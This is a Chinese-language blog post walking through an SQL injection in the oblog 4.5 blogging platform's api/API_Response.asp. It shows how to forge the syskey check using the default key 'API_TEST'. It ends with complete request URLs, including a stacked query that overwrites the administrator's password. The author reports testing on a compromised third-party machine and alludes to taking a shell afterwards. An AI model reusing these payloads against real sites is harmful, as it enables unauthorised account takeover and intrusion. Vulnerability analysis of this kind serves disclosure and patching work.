来源:Ruery's Blog

声明:本文乃提供脚本学习 不是为了让大家去黑更多的站而写 漏洞已修补 网上的已经没有有漏洞的站了

影响版本:oblog4.5 商业SQL (非Final版)

漏洞补丁地址:http://down.oblog.cn/oblog4/patch/Oblog45_Final_Patch0619.rar

漏洞文件:api/API_Response.asp

打开api/API_Response.asp看开头处 很快就可以看到 password没经过任何过滤就进SQL语句了 因为是update语句 所以只适用SQL版 ACC版利用不大

要执行这条语句还必须通过chksyskey这关 我们看看chksyskey是怎么回事 在同文件的稍微下面就能看到chksyskey的代码

'验证提交信息的合法性，目前oblogmd5文件为16位，只能验证提交的位数再判定（考虑新版本增加参数） 这里有点小小的问题就是chksyskey貌似已经初始化为true了 以为不用管 不过到最后测试还是失败 所以必须自己构造合适的syskey才能使

chksyskey=true

syskey是直接request过来的 构造也很简单 只要提交的syskey等于 你所提交的用户名+oblog_key的MD5值 chksyskey就等于true 大家要看

明白可能需要一点点ASP的基础喔

syskey的值必须跟提交的用户名相对应喔 oblog_key的值在api/Api_Config.asp里 默认是API_TEST 一般人不会去改他 官方也是 (官方在上次

进去时已经知道不是SQL了,555)

我测试时提交的用户名是hackhua 所以提交的syskey值是hackhuaAPI_TEST的MD5值 就是8092826db0ab2902 你喜欢提交什么用户名都可

以 不需要注册 只要适当的修改MD5就可以了

password随意 savecookie要不就0要不就1都可以 下面开始测试 我用师傅的肉鸡架起OBLOG 地址就隐藏咯

首先提交http://www.XXXXXXX.com/oblog45/api/API_Response.asp?syskey=8092826db0ab2902&username=hackhua&savecookie=0&password=1'

返回错误 下面我们把管理ID为1的管理员密码改成123465

提交http://www.XXXXXXX.com/oblog45/api/API_Response.asp?syskey=8092826db0ab2902&username=hackhua&savecookie=0&password=1';update oblog_admin set password='7cc9bfe9291ac66b' where id=1--

这样就完成了 拿SHELL就不说了 我没进后台直接把数据库的图截出来 不信拉倒 :) 当时是想等OBLOG4.5SQL版出来再告诉官方的 貌似

马JJ把洞提交给官方换了个SQL版回来 不过也好 让我调试 我只是菜鸟哪错了别骂我哈本文出自 51CTO.COM技术博客